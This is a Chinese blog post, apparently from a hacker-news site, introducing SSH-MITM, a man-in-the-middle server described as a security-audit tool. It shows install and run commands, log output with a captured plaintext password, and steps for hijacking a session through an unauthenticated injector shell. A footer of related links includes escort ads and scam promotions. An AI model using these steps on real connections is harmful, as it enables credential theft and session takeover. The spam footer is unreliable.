SSH-MITM:支持公钥认证&会话劫持和文件篡改的安全审计MITM服务器

访客4年前黑客资讯716

SSH-MITM-拦截SSH流量

SSH-MITM服务器专为安全审计而设计,支持公钥认证、会话劫持和文件篡改等功能。需要注意的是,该工具基于Python语言开发,因此需要在主机设备上安装并配置好Python环境。

SSH-MITM安装

在使用任何软件包之前,我们都需要进行正确的安装。如需安装SSH-MITM,我们只需要在设备上打开命令行终端,然后运行下列命令即可:

$ pip install ssh-mitm

工具使用

SSH-MITM的使用非常简单,如果需要密码认证或会话劫持,只需要开启拦截MITM-SSH服务器即可。打开命令行终端,然后运行下列命令:

$ ssh-mitm --remote-host 192.168.0.x

接下来,我们尝试跟SSH-MITM服务器建立连接。SSH-MITM服务器会监听10022端口:

$ ssh -p 10022 user@proxyserver

此时,我们将会看到凭证信息在日志中输出:

2021-01-01 11:38:26,098 [INFO] ?Client connection established with parameters:

Remote Address: 192.168.0.x

Port: 22

Username: user

Password: supersecret

Key: None

Agent: None

会话劫持

获取明文凭证信息仅仅只是SSH-MITM的其中一个功能而已,当客户端成功连接之后,SSH-MITM会开启一个新的服务器,并用于会话劫持:

2021-01-01 11:42:43,699 [INFO] ?created injector shell on port 34463. connect with: ssh -p 34463 127.0.0.1

在劫持会话的时候,我们可以选择自己喜欢的SSH客户端。需要注意的是,这个连接不需要任何身份验证:

$ ssh -p 34463 127.0.0.1

建立连接之后,你的会话只会通过最新的响应信息来更新,但是我们仍然可以执行任意命令。

接下来,我们就可以在劫持的会话或原始会话中尝试执行某些命令了。

命令的执行结果将输出显示在两个会话中。

项目地址

SSH-MITM:【GitHub传送门

相关文章

北京网站首页商务伴游陌陌号美联航空姐伴游 Beijing website home page business travel

简单自我介绍 语言表达:普通话水平,著作:模特秀五强,文凭:理工大学,服务平台确保:无请假,是不是整容手术:无ps修图无整,岗位:网络主播,文凭:硕士研究生,个人专长:rap,预定時间:每星期一,服务...

阻止外部入侵黑客攻击(防止黑客入侵)

阻止外部入侵黑客攻击(防止黑客入侵)

本文目录一览: 1、怎么防止黑客攻击? 2、如何预防和抵制黑客入侵 3、怎么防御黑客攻击? 4、防止黑客攻击的方法有哪些? 5、怎样防止网络黑客攻击呢 ? 怎么防止黑客攻击? 怎么防...

微信营销案例(微信营销的基本流程分析)

微信营销案例(微信营销的基本流程分析)

这个好说,好的营销案例,具体也要看是哪方面的。我这边大多数还是围绕微信做营销卖货的。这边说一个我自己遇到的案例。 伟哥他们团队是个怎么样的团队呢?他们负责“某芳旗舰店”的微信运营。2015年某芳电商开...

黑客需要读的几本书(黑客必读书)

黑客需要读的几本书(黑客必读书)

见招拆招黑客攻防完全手册内容简介 1、总之,《见招拆招黑客攻防完全手册》是一本集知识性、实用性与深度性于一身的网络安全书籍。它不仅为网络安全爱好者提供了全面的学习资源,也为专业人士提供了深入研究的平台...

黑客软件ATE交易所破解(黑客交易平台)

黑客软件ATE交易所破解(黑客交易平台)

本文导读目录: 1、vast交易所可以用黑客攻击它吗? 2、比特币交易所总是被黑客攻击,怎么办? 3、我的股票交易密码忘记了,该怎么处理呢? 4、股票交易密码忘记了怎么办? 5、股票交...

码上赚:挂机免费赚钱,天天提现0.5元!

上个月推荐了一个叫云上钱社的,现在又来个叫码上赚,界面一模一样。天天挂几分钟,够0.5米后直接提现支付宝,不知道什么原因,这次没有秒到账,不外感受后面会到的。人人都试试看,骗子的钱不要白不要!...